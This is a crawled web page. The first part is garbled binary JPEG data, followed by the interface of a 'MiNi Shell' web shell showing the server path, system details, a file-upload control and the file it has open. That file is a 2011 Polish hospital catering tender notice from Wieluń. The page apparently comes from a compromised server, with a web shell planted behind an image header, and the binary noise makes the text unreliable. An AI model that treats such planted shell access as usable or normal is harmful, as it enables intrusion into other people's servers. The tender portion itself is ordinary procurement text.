JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110103/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110103/480-N-2011.html

<p class="kh_header"><b>Wieluń: Usługa codziennego  przygotowywania i dostarczania wyżywienia dla pacjentów Szpitala - catering.</b><br>
<b>Numer ogłoszenia: 480 - 2011; data zamieszczenia: 03.01.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Wieluniu , ul. Szpitalna 16, 98-300 Wieluń, woj. łódzkie, tel. +48 043 8438311 w. 355, faks 043 843 83 11 wew. 213.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.powiat.wielun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa codziennego  przygotowywania i dostarczania wyżywienia dla pacjentów Szpitala - catering..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest: usługa codziennego  przygotowywania i dostarczania wyżywienia dla pacjentów Szpitala - catering.
 1.1. Wykonawca  gwarantuje, że   przygotowanie  posiłków  będzie  przeprowadzane  zgodnie  z  warunkami   określonymi  w  ustawie  z 25 sierpnia  2006 r. o bezpieczeństwie żywności  i  żywienia ( Dz. U z 2006 r. Nr 171,  poz. 1225 )
 1. 2. Każdy posiłek podstawowy (śniadanie, obiad i kolacja) z tzw. diety normalnej zgodnie z  załącznikiem  nr 6, musi  zawierać dostateczną ilość  produktów białkowych oraz dodatek warzyw lub owoców. Wartość   kaloryczna posiłków ogółem powinna  się  mieścić w  granicach 2300 - 2400 kcal,  w tym białko  ogółem  80g, w tym  białko  zwierzęce - 45g, tłuszcze - 80g, węglowodany - 325g.
    Wartość  kaloryczna  poszczególnych  posiłków  winna  mieścić  się  w  następujących   przedziałach :
  - śniadanie -690 - 805 kcal, co  stanowi  30-35 % rozdziału całodziennego  zapotrzebowania   energetycznego  na  poszczególne  posiłki. W przypadku  diet cukrzycowych dla chorych  przyjmujących  insulinę  oraz  diety  dziecięcej  należy  przewidzieć  również  II  śniadanie. 
- obiad -  805 - 920 kcal, co  stanowi  35 - 40 % rozdziału całodziennego  zapotrzebowania energetycznego  na  poszczególne  posiłki
-  kolacja - 575 - 690 kcal, co  stanowi  25 - 30 % rozdziału całodziennego  zapotrzebowania energetycznego  na  poszczególne  posiłki. W przypadku  diet cukrzycowych dla chorych  przyjmujących  insulinę  oraz  diety  dziecięcej  należy  przewidzieć  również  podwieczorek.
1. 3.  Realizacja średnich  norm  żywieniowych  według  grup  produktów  przedstawiać  się  musi  następująco : 
- produkty zbożowe - 400g
- mleko i produkty mleczne - 500g
- jaja - 15g 
- mięso, wędliny i ryby - 140g
- masło i śmietana - 30g
- inne tłuszcze - 35g
- ziemniaki - 400g
- warzywa i owoce z witamina C - 200g
- warzywa z karotenem - 130g
- inne  warzywa i owoce - 300g
- strączkowe suche - 10g
- cukier i słodycze - 55g
1. 4. Do posiłków : śniadanie  - należy przewidzieć kawę mleczną lub zupę mleczną, 
                              obiad - kompot lub kisiel płynny itp.
                              kolacja - należy planować herbatę wraz z cukrem.
Gramatura  mięsa  na  obiad podawana  z  sosem powinna  wynosić - 120g, bez  sosu - 100g. Dodatki  do  obiadu  w  postaci  surówek  roślinnych  lub  warzyw  gotowanych muszą  wynosić  co  najmniej  120g. 
Posiłki gorące, dostarczane muszą być w temp. zupy   75 0C, II danie 63 0C, surówki 4 0C.
1. 5. Przygotowywanie posiłków odbywać się musi z uwzględnieniem diet stosowanych w 
    tutejszym szpitalu, oraz zgodnie ze zleceniami lekarzy, wg zamówień z poszczególnych 
    oddziałów (wykaz stosowanych diet w załączeniu).
1. 6. Zamawianie posiłków na dany dzień realizowane będzie przez uprawnionych pracowników  Szpitala.
1. 7.  Posiłki należy dostarczać wg ustalonego harmonogramu, w osobnych naczyniach     (termosach) z oznaczeniem oddziału dla którego jest dostawa i ilością porcji. Termosy wraz z     wkładami zabezpiecza Wykonawca.
1. 8.  Do obowiązków Wykonawcy należy dostarczenie indywidualnych naczyń na posiłki oraz sztućcy.
1. 9.  Zapotrzebowania na posiłki dla pacjentów przyjmowanych do Szpitala w godzinach :
      a)16:00 dnia poprzedniego,  do godz.-7:30 dnia którego zamówienie dotyczy zgłaszane  będą Wykonawcy  telefonicznie ,do godziny 7:45 , a następnie potwierdzane pisemnie  FAX), śniadanie  
       b)dla pacjentów przyjętych do Szpitala w godzinach 7:30 - 11:00 zgłaszane będą  Wykonawcy telefonicznie do godziny 11:10 i również potwierdzane pisemnie (FAX), obiad 
      c)dla pacjentów przyjętych do Szpitala w godzinach 11:00 - 17:00 zgłaszane będą   Wykonawcy telefonicznie do  godziny 17:10 i również potwierdzane pisemnie(FAX),  Kolacja
1. 10.  Wykonawca zobowiązany będzie do sporządzania dekadowych jadłospisów w oparciu o aktualne przepisy  prawne obowiązujące przy ustalaniu racji pokarmowych w całodziennym  wyżywieniu określonych grup ludności  - Szpitale. 
1. 11.  Jadłospis winien być przedstawiony do akceptacji Zamawiającego z 4 dniowym  wyprzedzeniem. Należy  uwzględnić przygotowywanie posiłków tradycyjnych w okresach  świątecznych.
1. 12.  Do Wykonawcy należało będzie prowadzenie ewidencji wydawanych posiłków (dokument WZ) z podziałem na diety oraz oddziały, potwierdzane każdorazowo imiennie przez uprawnione osoby, Zamawiający zastrzega sobie prawo do kontroli zgodności  rachunków z ewidencją tych posiłków.
1. 13.  Zakupy surowców Wykonawca realizował będzie w punktach, które zapewniają ich  wysoką  jakość, zupy powinny być przygotowywane na bazie produktów naturalnych bez  użycia  półproduktów (np. zupy w proszku).
1. 14.  W przypadku zastosowania innych technologii produkcji posiłków niż wymagane lub zalecane stosownymi przepisami Wykonawca musi uzyskać zgodę Powiatowej Stacji Sanitarno-Epidemiologicznej na ich  stosowanie. Zamawiający zastrzega sobie prawo  bieżącej kontroli w zakresie przestrzegania przez  
           Wykonawcę przepisów dotyczących technologii produkcji i  jakości wykonywanych usług.
1. 15.  Obowiązkiem Wykonawcy  będzie  : 
- Wykonawca zobowiązany jest do przejęcia pracowników dystrybucji posiłków - osób 2 
- dostarczanie posiłków do pomieszczenia dystrybucji  w Szpitalu.
- mycie termosów  wraz z wkładami po wydaniu posiłków.
- utrzymywanie  czystości i porządku  oraz  odpowiedniego  stanu  sanitarno - technicznego  pomieszczenia  do  dystrybucji  posiłków
- przechowywanie próbek pokarmowych ze wszystkich  wykonanych i dostarczonych posiłków każdego dnia przez okres 72 godzin z  oznaczeniem daty, godziny, zawartości próbki pokarmowej z podpisem osoby  odpowiedzialnej za pobieranie tych próbek. 
- utylizacja odpadków żywnościowych
1. 16.  Maksymalna odległość na jaką Zamawiający dopuszcza dowożenie posiłków od Wykonawcy  do siedziby  
  Zamawiającego nie może przekroczyć 30 km.
1. 17.  Do oferty należy dołączyć przykładowy jadłospis dekadowy dla diety podstawowej tzw.   
     normalnej  wraz z gramaturą oraz  ich  wartością  kaloryczną. W  jadłospisie  dekadowym  
     nie  powinny  się  powtarzać  tzw. potrawy  podstawowe  w każdym z posiłków. 
     Jadłospis  należy  przygotować  zgodnie  z  poniższą  tabelą : 
1. 18.  Ilość oddziałów do których będą  dostarczane posiłki  - 11
 - Ilość łóżek w oddziałach:
1.Oddział Internistyczny o p. Ogólnym 		- szt 45+4
2.Oddział Internistyczny o p. Kardiologicznym	- szt 45
3.Oddział Pulmonologii  			            - szt 39
4.Oddział Dziecięcy					- szt 25
5.Oddział Chirurgii Ogólnej				- szt 25
6.Oddział Chirurgii Dziecięcej			- szt 20 
7.Oddział Chirurgii Urazowo-Ortopedycznej		- szt 25
8.Oddział Położniczo-Ginekologiczny		- szt 46
9.Oddział Anestezjologii i Intensywnej Terapii	- szt 5
10.Szpitalny Oddział Ratunkowy			- szt 4  
11.Oddział Rehabilitacji				- szt 20
Ilość łóżek  ogółem                                                  - 303

1. 19.  Posiłki dla pacjentów muszą być dostarczone do Szpitala o ściśle określonych porach dnia, w związku z ustalonymi godzinami ich podawania :
- śniadanie dostarczyć do 7:30 , podanie 8:00 do 9:00
- obiad  dostarczyć do 11:30 podanie od 12:00 do 13:00
- kolacja dostarczyć do 16:30 podanie od 17:00 do 18:00
1. 20.  Średnia planowana ilość posiłków na rok 2011-  76.000.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.52.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. W przypadku osób fizycznych oświadczenie wymienione w pkt. A.3) niniejszej specyfikacji.
- zaświadczenie o wpisie do rejestru zakładów podlegających urzędowej kontroli organów Państwowej Inspekcji Sanitarnej, zgodnie z art. 62 ustawy z dnia 25 sierpnia 2006 roku o bezpieczeństwie żywności i żywienia (Dz.U.06.171.1225 z zm.), 
-  oświadczenie Wykonawcy o stosowaniu działań zgodnych z zasadami systemu HACCP, zapewniającej bezpieczeństwo żywności i żywienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Wykonawca wykaże się wykonaniem, a w przypadku świadczeń   okresowych lub ciągłych również wykonywaniem w okresie 3 ostatnich trzech lat przed upływem terminu składania ofert, (a jeżeli okres wykonywania działalności jest  krótszy - w tym okresie) co najmniej jednej  usługi w zakresie żywienia pacjentów zakładów  opieki zdrowotnej o wartości brutto nie mniejszej niż   500.000,00  ( SŁOWNIE: PIĘĆSET   TYSIĘCY   ZŁOTYCH) wartości   wpisanej w formularzu ofertowym - ZAŁĄCZNIK NR 7.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Wykonawca wykaże, że dysponuje środkami transportu Wykorzystywanymi w celu realizacji zamówienia, posiadającymi odpowiednie zaświadczenie stwierdzające spełnianie wymagań sanitarnych dotyczących transportu posiłków wydane przez właściwego Państwowego Powiatowego Inspektora Sanitarnego - ZAŁĄCZNIK NR 8.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, niezależnie od tego, czy są one zatrudnione bezpośrednio przez wykonawcę, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności -- ZAŁĄCZNIK NR 9.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-Opłaconą  polisę  a  w  przypadku  jej braku inny  dokument potwierdzający, że Wykonawca  jest  ubezpieczony od odpowiedzialności  cywilnej  w  Zakresie  prowadzonej  działalności, obowiązujący  przez  cały  okres  wykonywania zamówienia, na sumę gwarancyjną  nie  niższą  niż  połowa  wartości  kontraktu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.powiat.wielun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Na wniosek Wykonawcy Specyfikację istotnych warunków zamówienia można uzyskać w Dziale OiZP pokój 204 - nieodpłatnie SPZOZ w Wieluniu, ul. Szpitalna 16, 98-300 Wieluń...</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.01.2011 godzina 10:00, miejsce: Samodzielny Publiczny Zakład Opieki Zdrowotnej w Wieluniu, ulica Szpitalna 16 , 98 - 300 Wieluń - SEKRETARIAT POKÓJ nr 216...</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com